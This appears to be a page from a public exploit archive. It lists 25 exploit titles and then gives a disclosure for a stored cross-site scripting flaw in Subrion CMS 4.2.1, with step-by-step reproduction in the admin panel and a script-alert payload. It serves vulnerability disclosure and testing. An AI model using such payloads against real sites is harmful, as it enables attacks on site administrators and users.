6bc7a6f9b0
25 changes to exploits/shellcodes/ghdb ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS) Tapo C310 RTSP server v1.3.0 - Unauthorised Video Stream Access ZKTeco ZEM/ZMM 8.88 - Missing Authentication Hashicorp Consul v1.0 - Remote Command Execution (RCE) X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF) OPSWAT Metadefender Core - Privilege Escalation Pega Platform 8.1.0 - Remote Code Execution (RCE) Beauty-salon v1.0 - Remote Code Execution (RCE) BoxBilling<=4.22.1.5 - Remote Code Execution (RCE) iBooking v1.0.8 - Arbitrary File Upload Jetpack 11.4 - Cross Site Scripting (XSS) Moodle LMS 4.0 - Cross-Site Scripting (XSS) Online shopping system advanced 1.0 - Multiple Vulnerabilities rukovoditel 3.2.1 - Cross-Site Scripting (XSS) Senayan Library Management System v9.5.0 - SQL Injection Social-Share-Buttons v2.2.3 - SQL Injection Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS) YouPHPTube<= 7.8 - Multiple Vulnerabilities Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF) SuperMailer v11.20 - Buffer overflow DoS Tunnel Interface Driver - Denial of Service VMware Workstation 15 Pro - Denial of Service HDD Health 4.2.0.112 - 'HDDHealth' Unquoted Service Path SugarSync 4.1.3 - 'SugarSync Service' Unquoted Service Path
17 lines
No EOL
564 B
Text
17 lines
No EOL
564 B
Text
# Exploit Title: Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS)
|
|
# Date: 2022-08-10
|
|
# Exploit Author: Sinem Şahin
|
|
# Vendor Homepage: https://intelliants.com/
|
|
# Version: 4.2.1
|
|
# Tested on: Windows & XAMPP
|
|
|
|
==> Tutorial <==
|
|
|
|
1- Go to the following url. => http://(HOST)/panel/fields/add
|
|
2- Write XSS Payload into the tooltip value of the field add page.
|
|
3- Press "Save" button.
|
|
4- Go to the following url. => http://(HOST)/panel/members/add
|
|
|
|
XSS Payload ==> "<script>alert("field_tooltip_XSS")</script>
|
|
|
|
Reference: ://github.com/intelliants/subrion/issues/895 |